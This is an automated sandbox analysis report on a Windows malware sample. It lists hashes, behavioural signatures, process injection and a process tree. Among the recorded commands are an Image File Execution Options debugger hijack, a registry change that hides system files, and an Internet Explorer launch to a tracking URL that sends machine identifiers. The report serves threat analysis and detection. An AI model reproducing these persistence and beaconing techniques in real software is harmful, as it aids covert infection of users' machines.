Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 01:09
Static task
static1
Behavioral task
behavioral1
Sample
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe
-
Size
256KB
-
MD5
9efad46c3e0b1db3fa7ed20c2a1e1363
-
SHA1
ba6c77e60584b33746fbdf99e8a2899f5ba1f28f
-
SHA256
1e26f05d3c3ffe7152ced679bac4d6583d86f525dc8b4c2f58683dd5f65368fa
-
SHA512
273bbd9d989254cecf9c010475cf8ad260f1ee358c23c8df61e7f3b3947a824c4172471e165a71441ad0edff1961d54247e67918118cd4c99a10029a690e5106
-
SSDEEP
6144:8+yFV0bgy2rM/kvt15RHxhZFtfaPNSfo/qPoPp:Ky2Q8V15VLccQ/qPox
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Thunder5.exe\Debugger = "svchost.exe" 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Thunder5.exe 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
Processes:
resource yara_rule behavioral2/memory/4464-28-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-33-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-32-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-30-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-36-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-40-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-37-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-52-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect behavioral2/memory/4464-70-0x0000000000400000-0x0000000000412000-memory.dmp vmprotect -
Enumerates connected drives 3 TTPs 20 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exedescription ioc Process File opened (read-only) \??\U: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\X: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\T: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\N: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\Q: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\R: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\Y: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\L: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\H: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\I: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\J: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\M: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\O: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\P: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\V: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\E: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\W: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\K: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\S: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe File opened (read-only) \??\G: 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exedescription pid Process procid_target PID 2692 set thread context of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 set thread context of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 set thread context of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 -
Processes:
resource yara_rule behavioral2/memory/1572-1-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-4-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-2-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-6-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-8-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-7-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-9-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-12-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-24-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-27-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-25-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-43-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-54-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-57-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-66-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-81-0x0000000000400000-0x0000000000457000-memory.dmp upx behavioral2/memory/1572-96-0x0000000000400000-0x0000000000457000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exedescription ioc Process File created C:\Windows\Tasks\9 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exeIEXPLORE.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Processes:
IEXPLORE.EXEIEXPLORE.EXEdescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9026441ba03fdb01 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31145888" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000042e7dba96731da408b68fe0ed5b0a2460000000002000000000010660000000100002000000020ff7dce904acf20560076b98121b1b387d36f362cd6154c950ccac8b0200dbf000000000e80000000020000200000005963a6e85e7a8734c3b372fb7cc73cd8f32659041da6ab38881823a890532bf5200000003e6e518d278a704d3a9b0b529b09f018eedab63ba0935d2e319c502a8b1880c840000000f084dc1e32f47f1c0dc963da2905b7d31b1a04ae0630a591d2cf940241a9fb4c72a96ef4c2a59094d9914db57752c085843b86cb0dab857b6a8c86908bebdeb5 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "443863710" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80c34d1ba03fdb01 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31145888" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000042e7dba96731da408b68fe0ed5b0a246000000000200000000001066000000010000200000006412d2c6277554dccdac3af7f876e5aad123f0f118805b30b0f40af4e49697b1000000000e80000000020000200000000f6567a0f0422484859ce94c8028fe00f14d709d0e5536db3c6433bf3c64f78e20000000dd908a0eff64898a1feab93f5f8c51d4eac73de9cfeca3f10f34ce5a39288a0c40000000da9f2ae4fe4bff6e2bb5f4041996c6315368a40bac8b21730f61ed9e6c413bb487ff620645cd51649f3a07f3b12a110fe8614147374f3fce5acb8abdf97a5ec6 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "443863710" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "446676046" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4614D067-AB93-11EF-91C3-CA65FB447F0B} = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31145888" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439348424" IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 38 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exepid Process 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 660 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exedescription pid Process Token: SeDebugPrivilege 2356 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exeIEXPLORE.EXEpid Process 1572 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 1572 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 1572 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2352 IEXPLORE.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exepid Process 1572 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 1572 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 1572 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exeIEXPLORE.EXEIEXPLORE.EXEpid Process 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 2352 IEXPLORE.EXE 2352 IEXPLORE.EXE 1800 IEXPLORE.EXE 1800 IEXPLORE.EXE 1800 IEXPLORE.EXE 1800 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exeIEXPLORE.EXEdescription pid Process procid_target PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 1572 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 83 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 2356 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 91 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 2692 wrote to memory of 4464 2692 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 94 PID 4464 wrote to memory of 2352 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 102 PID 4464 wrote to memory of 2352 4464 9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe 102 PID 2352 wrote to memory of 1800 2352 IEXPLORE.EXE 104 PID 2352 wrote to memory of 1800 2352 IEXPLORE.EXE 104 PID 2352 wrote to memory of 1800 2352 IEXPLORE.EXE 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1572
-
-
C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"2⤵
- Modifies visiblity of hidden/system files in Explorer
- Event Triggered Execution: Image File Execution Options Injection
- Enumerates connected drives
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9efad46c3e0b1db3fa7ed20c2a1e1363_JaffaCakes118.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://tongji.maxjust555.cn/avastcnzztj/dddxxx.htm?mac=633467663&os=windowsXP&ver=20090323&id=6747150743⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2352 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1800
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5a6dfcf513cd338ab2640f399e560ba31
SHA1cbc6ea36eef4c8e6e8524b2aa220b9c0017a9145
SHA256fac20d9c0f5375b23b8932cb8ecb0839245962b4b2cd91924cfc0d9206e4fabf
SHA5127b2dc6f8ac8fc1503caa508e8efb767a99448c35ab4714c46c034536b4b7b9067b2bf3170798130fe5a9d2763f38308aba868ca301791d0abf60e169d17acd12
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5ece8e920eaa5719becace852bcfb7679
SHA1c1b6922821a4c44aa1738059a7f0d8311a497c86
SHA25684abfe3f443f4513859fccd347003e6bcdadb1f29d5ef5fafd265a3a23c56b55
SHA512640e6ad40600aa01d53eb5e31f0a46daaa2d80ed24c8f6b3c67500dd763af5017a7ad081839b2d58e7b85e57db090f0f16b7d5e760b34420db2c813b8851d136
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee